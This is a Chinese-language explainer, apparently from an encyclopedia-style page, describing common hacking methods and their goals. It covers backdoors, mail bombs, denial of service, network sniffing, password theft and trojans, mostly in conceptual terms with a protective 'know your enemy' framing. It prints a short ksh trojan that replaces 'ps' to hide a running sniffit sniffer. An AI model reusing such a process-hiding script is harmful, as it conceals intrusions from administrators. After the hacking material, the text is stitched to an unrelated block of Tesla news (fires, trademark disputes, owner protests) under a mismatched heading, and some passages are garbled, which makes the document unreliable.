什么是黑客攻击？为什么要攻击？怎么攻击的？

黑客攻击

开放分类： 电脑、技术类、军事类

---------------解释1-------------------

一、黑客常用攻击手段

黑客攻击手段可分为非破坏性攻击和破坏性攻击两类。非破坏性攻击一般是为了扰乱系统的运行，并不盗窃系统资料，通常采用拒绝服务攻击或信息炸弹；破坏性攻击是以侵入他人电脑系统、盗窃系统保密信息、破坏目标系统的数据为目的。下面为大家介绍4种黑客常用的攻击手段（小编注：密码破解当然也是黑客常用的攻击手段之一）。

1、后门程序

由于程序员设计一些功能复杂的程序时，一般采用模块化的程序设计思想，将整个项目分割为多个功能模块，分别进行设计、调试，这时的后门就是一个模块的秘密入口。在程序开发阶段，后门便于测试、更改和增强模块功能。正常情况下，完成设计之后需要去掉各个模块的后门，不过有时由于疏忽或者其他原因（如将其留在程序中，便于日后访问、测试或维护）后门没有去掉，一些别有用心的人会利用穷举搜索法发现并利用这些后门，然后进入系统并发动攻击。

2、信息炸弹

信息炸弹是指使用一些特殊工具软件，短时间内向目标服务器发送大量超出系统负荷的信息，造成目标服务器超负荷、网络堵塞、系统崩溃的攻击手段。比如向未打补丁的 Windows 95系统发送特定组合的 UDP 数据包，会导致目标系统死机或重启；向某型号的路由器发送特定数据包致使路由器死机；向某人的电子邮件发送大量的垃圾邮件将此邮箱“撑爆”等。目前常见的信息炸弹有邮件炸弹、逻辑炸弹等。

3、拒绝服务

拒绝服务又叫分布式D.O.S攻击，它是使用超出被攻击目标处理能力的大量数据包消耗系统可用系统、带宽资源，最后致使网络服务瘫痪的一种攻击手段。作为攻击者，首先需要通过常规的黑客手段侵入并控制某个网站，然后在服务器上安装并启动一个可由攻击者发出的特殊指令来控制进程，攻击者把攻击对象的IP地址作为指令下达给进程的时候，这些进程就开始对目标主机发起攻击。这种方式可以集中大量的网络服务器带宽，对某个特定目标实施攻击，因而威力巨大，顷刻之间就可以使被攻击目标带宽资源耗尽，导致服务器瘫痪。比如1999年美国明尼苏达大学遭到的黑客攻击就属于这种方式。

4、网络监听

网络监听是一种监视网络状态、数据流以及网络上传输信息的管理工具，它可以将网络接口设置在监听模式，并且可以截获网上传输的信息，也就是说，当黑客登录网络主机并取得超级用户权限后，若要登录其他主机，使用网络监听可以有效地截获网上的数据，这是黑客使用最多的方法，但是，网络监听只能应用于物理上连接于同一网段的主机，通常被用做获取用户口令。

二、黑客攻击的目的

一、进程的执行

攻击者在登上了目标主机后，或许只是运行了一些简单的程序，也可能这些程序是无伤大雅的，仅仅只是消耗了一些系统的CPU时间。

但是事情并不如此简单，我们都知道，有些程序只能在一种系统中运行，到了另一个系统将无法运行。一个特殊的例子就是一些扫描只能在UNIX系统中运行，在这种情况下，攻击者为了攻击的需要，往往就会找一个中间站点来运行所需要的程序，并且这样也可以避免暴露自己的真实目的所在。即使被发现了，也只能找到中间的站点地址。

在另外一些情况下，假使有一个站点能够访问另一个严格受控的站点或网络，为了攻击这个站点或网络，入侵者可能就会先攻击这个中间的站点。这种情况对被攻击的站点或网络本身可能不会造成破坏，但是潜在的危险已经存在。首先，它占有了大量的处理器的时间，尤其在运行一个网络监听软件时，使得一个主机的响应时间变得非常的长。另外，从另一个角度来说，将严重影响目标主机的信任度。因为入侵者借助于目标主机对目标主机能够访问，而且严格受控的站点或进行攻击。当造成损失时，责任会转嫁到目标主机的管理员身上，后果是难以估计的。可能导致目标主机损失一些受信任的站点或网络。再就是，可能人民者将一笔账单转嫁到目标主机上，这在网上获取收费信息是很有可能的。

二、获取文件和传输中的数据

攻击者的目标就是系统中的重要数据，因此攻击者通过登上目标主机，或是使用网络监听进行攻击事实上，即使连入侵者都没有确定要于什么时，在一般情况下，他会将当前用户目录下的文件系统中的/etc/hosts或/etc/passwd复制回去。

三、获取超级用户的权限

具有超级用户的权限，意味着可以做任何事情，这对入侵者无疑是一个莫大的诱惑。在UNIX系统中支持网络监听程序必需有这种权限，因此在一个局域网中，掌握了一台主机的超级用户权限，才可以说掌握了整个子网。

四、对系统的非法访问

有许多的系统是不允许其他的用户访问的，比如一个公司、组织的网络。因此，必须以一种非常的行为来得到访问的权力。这种攻击的目的并不一定要做什么，或许只是为访问面攻击。在一个有许多windows95

的用户网络中，常常有许多的用户把自己的目录共享出未，于是别人就可以从容地在这些计算机上浏览、寻找自己感兴趣的东西，或者删除更换文件。或许通过攻击来证明自己技术的行为才是我们想像中的黑客行径，毕竟，谁都不喜欢些专门搞破坏，或者给别人带来麻烦的入侵者。但是，这种非法访问的的黑客行为，人们也不喜欢的。

五、进行不许可的操作

有时候，用户被允许访问某些资源，但通常受到许多的限制。在一个UNIX系统中没有超级用户的权限，许多事情将无法做，于是有了一个普通的户头，总想得到一个更大权限。在windowsNT系统中一样，系统中隐藏的秘密太多了，人们总经不起诱惑。例如网关对一些站点的访问进行严格控制等。许多的用户都有意无意地去尝试尽量获取超出允许的一些权限，于是便寻找管理员在置中的漏洞，或者去找一些工具来突破系统的安全防线，例如，特洛伊木马就是一种使用多的手段。

六、拒绝服务

同上面的目的进行比较，拒绝服务便是一种有目的的破坏行为了。拒绝服务的方式很多，如将连接局域网的电缆接地；向域名服务器发送大量的无意义的请求，使得它无法完成从其他的主机来的名字解析请求；制造网络风暴，让网络中充斥大量的封包，占据网络的带宽，延缓网络的传输。

七、涂改信息

涂改信息包括对重要文件的修改、更换，删除，是一种很恶劣的攻击行为。不真实的或者错误的信息都将对用户造成很大的损失。

八、暴露信息

入侵的站点有许多重要的信息和数据可以用。攻击者若使用一些系统工具往往会被系统记录下来如果直接发给自己的站点也会暴露自己的身份和地址，于是窃取信息时，攻击者往往将这些信息和数据送到一个公开的FTP站点，或者利用电子邮件寄往一个可以拿到的地方，等以后再从这些地方取走。

这样做可以很好隐藏自己。将这些重要的信息发往公开的站点造成了信息的扩散，由于那些公开的站点常常会有许多人访问，其他的用户完全有可能得到这些情息，并再次扩散出去。

三、黑客攻击的工具

（一）

应该说，黑客很聪明，但是他们并不都是天才，他们经常利用别人在安全领域广泛使用的工具和技术。一般来说。他们如果不自己设计工具，就必须利用现成的工具。在网上，这种工具很多，从SATAN、ISS到非常短小实用的各种网络监听工具。

在一个UNIX系统中，当入侵完成后，系统设置了大大小小的漏洞，完全清理这些漏洞是很困难的，这时候只能重装系统了。当攻击者在网络中进行监听，得到一些用户的口令以后，只要有一个口令没有改变，那么系统仍然是不安全的，攻击者在任何时候都可以重新访问这个网络。

对一个网络，困难在于登上目标主机。当登上去以后有许多的办法可以用。即使攻击者不做任何事，他仍然可以得到系统的重要信息，并扩散出去，例如：将系统中的hosts文件发散出去。严重的情况是攻击者将得到的以下口令文件放在网络上进行交流。每个工具由于其特定的设计都有各自独特的限制，因此从使用者的角度来看，所有使用的这种工具进行的攻击基本相同。例如目标主机是一台运行SunOS4.1.3的SAPRC工作站，那么所有用Strobe工具进行的攻击，管理员听见到的现象可能完全是一样的。了解这些标志是管理员教育的一个重要方面。

对一个新的入侵者来说，他可能会按这些指导生硬地进行攻击，但结果经常令他失望。因为一些攻击方法已经过时了(系统升级或打补丁进行入侵只会浪费时间），而且这些攻击会留下攻击者的痕迹。事实上，管理员可以使用一些工具，或者一些脚本程序，让它们从系统日志中抽取有关入侵者的信息。这些程序只需具备很强的搜索功能即可（如Perl语言就很适合做这件事了）。

（二）

当然这种情况下，要求系统日志没有遭到入侵。随着攻击者经验的增长、他们开始研究一整套攻击的特殊方法，其中一些方法与攻击者的习惯有关。由于攻击者意识到了一个工具除了它的直接用途之外，还有其他的用途，在这些攻击中使用一种或多种技术来达到目的，这种类型的攻击称为混合攻击。

攻击工具不局限于专用工具，系统常用的网络工具也可以成为攻击的工具，例如：要登上目标主机，便要用到telnet与rlogin等命令，对目标主机进行侦察，系统中有许多的可以作为侦察的工具，如finger和showmount。甚至自己可以编写一些工具，这并不是一件很难的事。其发回,如当服务器询问用户名时，黑客输入分号。这是一个UNIX命令，意思是发送一个命令、一些HTTP服务器就会将用户使用的分号过滤掉。入侵者将监听程序安装在UNIX服务器上，对登录进行监听，例如监听23、21等端口。

（三）

通过用户登录，把所监听到的用户名和口令保存起来，于是黑客就得到了账号和口令，在有大量的监听程序可以用，甚至自己可以编写一个监听程序。监听程序可以在windows95和windowsNT中运行。

除了这些工具以外，入侵者还可以利用特洛伊木马程序。例如：攻击者运行了一个监听程序，但有时不想让别人从ps命令中看到这个程序在执行（即使给这个程序改名，它的特殊的运行参数也能使系统管理员一眼看出来这是一个网络监听程序）。

攻击者可以将ps命令移到一个目录或换名，例如换成pss，再写一个shell程序，给这个shell程序起名为ps，放到ps所在的目录中：

#! /bin/ksh

pss-ef|grep-vsniffit|grep-vgrep

以后，当有人使用ps命令时，就不会发现有人在使用网络监听程序。这是一个简单的特洛伊木马程序。

另外，蠕虫病毒也可以成为网络攻击的工具，它虽然不修改系统信息，但它极大地延缓了网络的速度，给人们带来了麻烦。

---------------解释2-------------------

随着互联网黑客技术的飞速发展，网络世界的安全性不断受到挑战。对于黑客自身来说，要闯入大部分人的电脑实在是太容易了。如果你要上网，就免不了遇到黑客。所以必须知己知彼，才能在网上保持安全。那么黑客们有哪些常用攻击手段呢？

一、获取口令

这种方式有三种方法：一是缺省的登录界面（ShellScripts）攻击法。在被攻击主机上启动一个可执行程序，该程序显示一个伪造的登录界面。当用户在这个伪装的界面上键入登录信息（用户名、密码等）后，程序将用户输入的信息传送到攻击者主机，然后关闭界面给出提示信息“系统故障”，要求用户重新登录。此后，才会出现真正的登录界面。二是通过网络监听非法得到用户口令，这类方法有一定的局限性，但危害性极大，监听者往往能够获得其所在网段的所有用户账号和口令，对局域网安全威胁巨大；三是在知道用户的账号后（如电子邮件“＠”前面的部分）利用一些专门软件强行破解用户口令，这种方法不受网段限制，但黑客要有足够的耐心和时间；尤其对那些口令安全系数极低的用户，只要短短的一两分钟，甚至几十秒内就可以将其破解。

二、电子邮件攻击

这种方式一般是采用电子邮件炸弹（E－mailBomb），是黑客常用的一种攻击手段。指的是用伪造的IP地址和电子邮件地址向同一信箱发送数以千计、万计甚至无穷多次的内容相同的恶意邮件，也可称之为大容量的垃圾邮件。由于每个人的邮件信箱是有限的，当庞大的邮件垃圾到达信箱的时候，就会挤满信箱，把正常的邮件给冲掉。同时，因为它占用了大量的网络资源，常常导致网络塞车，使用户不能正常地工作，严重者可能会给电子邮件服务器操作系统带来危险，甚至瘫痪。

三、特洛伊木马攻击

“特洛伊木马程序”技术是黑客常用的攻击手段。它通过在你的电脑系统隐藏一个会在Windows启动时运行的程序，采用服务器／客户机的运行方式，从而达到在上网时控制你电脑的目的。黑客利用它窃取你的口令、浏览你的驱动器、修改你的文件、登录注册表等等，如流传极广的冰河木马，现在流行的很多病毒也都带有黑客性质，如影响面极广的“Nimda”、“求职信”和“红色代码”及“红色代码II”等。攻击者可以佯称自己为系统管理员（邮件地址和系统管理员完全相同），将这些东西通过电子邮件的方式发送给你。如某些单位的网络管理员会定期给用户免费发送防火墙升级程序，这些程序多为可执行程序，这就为黑客提供了可乘之机，很多用户稍不注意就可能在不知不觉中遗失重要信息。

四、诱入法

黑客编写一些看起来“合法”的程序，上传到一些FTP站点或是提供给某些个人主页，诱导用户下载。当一个用户下载软件时，黑客的软件一起下载到用户的机器上。该软件会跟踪用户的电脑操作，它静静地记录着用户输入的每个口令，然后把它们发送给黑客指定的Internet信箱。例如，有人发送给用户电子邮件，声称为“确定我们的用户需要”而进行调查。作为对填写表格的回报，允许用户免费使用多少小时。但是，该程序实际上却是搜集用户的口令，并把它们发送给某个远方的“黑客”。

五、寻找系统漏洞

许多系统都有这样那样的安全漏洞（Bugs），其中某些是操作系统或应用软件本身具有的，如Sendmail漏洞，Windows98中的共享目录密码验证漏洞和IE5漏洞等，这些漏洞在补丁未被开发出来之前一般很难防御黑客的破坏，除非你不上网。还有就是有些程序员设计一些功能复杂的程序时，一般采用模块化的程序设计思想，将整个项目分割为多个功能模块，分别进行设计、调试，这时的后门就是一个模块的秘密入口。在程序开发阶段，后门便于测试、更改和增强模块功能。正常情况下，完成设计之后需要去掉各个模块的后门，不过有时由于疏忽或者其他原因（如将其留在程序中，便于日后访问、测试或维护）后门没有去掉，一些别有用心的人会利用专门的扫描工具发现并利用这些后门，然后进入系统并发动攻击。

现在，你该知道黑客惯用的一些攻击手段了吧？当我们对黑客们的这些行为有所了解后，就能做到“知己知彼，百战不殆”，从而更有效地防患于未然，拒黑客于“机”外。网络的开放性决定了它的复杂性和多样性，随着技术的不断进步，各种各样高明的黑客还会不断诞生，同时，他们使用的手段也会越来越先进。我们惟有不断提高个人的安全意识，再加上必要的防护手段，斩断黑客的黑手。相信通过大家的努力，黑客们的舞台将会越来越小，个人用户可以高枕无忧地上网冲浪，还我们一片宁静的天空

身为特斯拉车主是怎样的体验

当地时间2013年10月1日，一辆特斯拉ModelS在美国华盛顿州肯特（Kent）的公路上碰撞金属物体后起火。随后失火场面的照片和视频在网络上广为传播，引发关注和热议，以及对于电动车安全性的质疑。特斯拉2013年股价增长了大约5倍，因而“特斯拉旋风”举世闻名。而这次起火事件之后股价出现大幅波动，仅仅10月2日下午不到一个小时之内，股价就从185.74美元暴跌到175.76美元。到23日股价一度滑坡10%以上，股价最低点曾达到168美元左右，这意味着市值蒸发了23亿美元。2013年10月底，另外一辆ModelS在墨西哥发生起火事故，原因是驾驶者在转弯时撞上、并穿过了一座水泥墙，最终撞在一棵树上停了下来。2013年11月，一辆2013款ModelS在田纳西州高速公路上与一辆牵引车（towhitch）相撞后起火，后者插入ModelS底盘。2014年7月4日上午，一名偷车嫌疑犯从Centinela大街5800街区的一家代理店中偷走一辆ModelS后驱车逃逸，在警方的追捕过程中，该车速度高达时速100英里，最终在与另一辆汽车相撞后冲向街边的路灯灯杆，逃逸车辆撞到灯杆后随即一分为二，后半身牢牢嵌入附近一栋建筑物入口，而前半身则因电池起火发生爆炸。从申请时间来看，占宝生是中国商标网查询结果中最早对英文“TESLA”商标提出申请的人。2006年9月6日，占宝生以个人名义首次对“TESLA”商标进行注册，申请号5588947。2009年6月28日，“TESLA”商标申请注册成功，占宝生成为合法拥有人。占宝生于2007年5月18日及2009年4月2日又分别对“特斯拉”和“TESLAMOTORS”两个商标进行申请注册，申请号为6055503和7298183。目前这两个商标处于“异议复审待审”状态。2006年12月30日，一个名叫乔伟伟的人曾以个人名义申请了一个商标，其中包含“TESLAMOTORS”、“特斯拉”以及图片三种元素，注册号5819809。该商标中虽然包含了和占宝生申请的“TESLA”商标相似的元素，但仍于2010年1月21日被核准通过。乔伟伟于2013年5月6日成功将该商标转让给特斯拉发动机有限公司，即Tesla公司，注册地址也随即变更为美国加州帕洛阿图鹿小溪路3500号。也就是说，Tesla公司目前也拥有一个受法律保护的Tesla相关商标，只不过这个商标有近似嫌疑，并且申请时间晚于占宝生。2014年4月，在电动车制造商Tesla的CEO埃隆·马斯克（ElonMusk）访华前夕，一场由23名来自中国大陆非京沪地区的Tesla“准车主”掀起了一场却因对交车顺序不满的集体“维权”行动，且愈演愈烈。这些Tesla在华的预订用户称：Tesla或没有按照应有的“既定顺序”交车，一些较晚订车的北京和上海用户已经被通知可以提车，而其它地区较早下订单的用户仍在等待。据媒体报道，23名用户委托律师起草的律师函已发送给拓速乐汽车销售（北京）有限公司（Tesla在中国的销售实体）和Tesla首席财务官DeepakAhuja。律师函中指称：Tesla在客户不知情情况下，违背承诺擅自单方面改变交车顺序，未履行交车义务，构成“虚假承诺”，涉嫌对消费者欺诈。一位首批预订特斯拉、但迟迟还没有拿到车的车主说，6月18日中午得到特斯拉中国销售的通知，他预订的ModelS在天津港清关时，发现关单号和车架号不符合，车辆已经被扣在海关。不符的单号需要返回美国总部重新报关，花费至少三个星期的时间再重新入关。这样算来，预计最快也要等到下个月中旬才能交付车主。媒体多次尝试联系特斯拉中国传播总监杨淑婷，但电话处于无人接听的状态，特斯拉服务中心的电话则因为是在非工作时间，也无人接听。媒体又联系到特斯拉商店与展厅，但工作人员表示并不清楚。2014年6月27日上午，在特斯拉亦庄维修站，被无数人追捧的特斯拉，在愤怒的维权车主于鑫泉手上瞬间变成了不堪入目的“破车”。为了争做第一批特斯拉车主，于鑫泉与其他维权车主一样，于2013年10月交了25万元定金订购了ModelS之后，但在今年4月份临交车前，他发现自己并不在首批提车的车主范围之列，于是与其他同样“遭遇”的车主一起进行了维权。最后特斯拉销售建议于鑫泉提取展车，并称展车与新车没有任何区别。然而于鑫泉表示，自己坚决不能要一辆二手车，并最终提车当天砸车。2014年7月15日，360在报告中称，TeslaModelS型汽车应用程序流程存在设计缺陷，利用漏洞可远程控制车辆，实现开锁、鸣笛、闪灯、开启天窗等操作，并能够在车辆行驶中开启天窗。此前有国外媒体报道，有黑客利用特斯拉的6位数密码实现对汽车的远程操控，但对智能汽车发起攻击的技术门槛仍然很高。对此特斯拉此回应称，对于报告的任何合法漏洞会调查，并采取快速行动进行应对和修复。同时特斯拉公司宣布，如果安全专家能够发现电动车的漏洞，将会重奖一万美元。负责特斯拉汽车安全漏洞的高管表示，特斯拉公司至少已经修补了外界发现的一个汽车安全漏洞。2014年8月，美国黑客大会DefCon在拉斯维加斯召开，特斯拉也来到大会现场，招募优秀的黑客人才加盟公司，同时对外发布奖励政策，邀请黑客高手，发现特斯拉电动车的安全漏洞。特斯拉计划招募20到30名优秀黑客——即信息安全技术专家，加盟特斯拉公司，专门解决特斯拉电动车的信息安全风险。内华达州里诺(Reno)当地日报《RenoGazette-Journal》报道称，美国电气工业工会TheInternationalBrotherhoodofElectricalWorkers在求职布告栏中称，特斯拉超级电池工厂建设项目规模已经缩减80%，电工职位的需求将发生变化。3月7日特斯拉发言人亚历克斯·乔治森(AlexisGeorgeson)否认延期并在一份电邮中称：“该项目正在推进中，超级电池工厂依然在按计划建设。”特斯拉上月表示，超级电池工厂将在今年安装设备，2016年开始生产电池组。特斯拉在英国遭起诉：被指破坏对手充电站建设协议。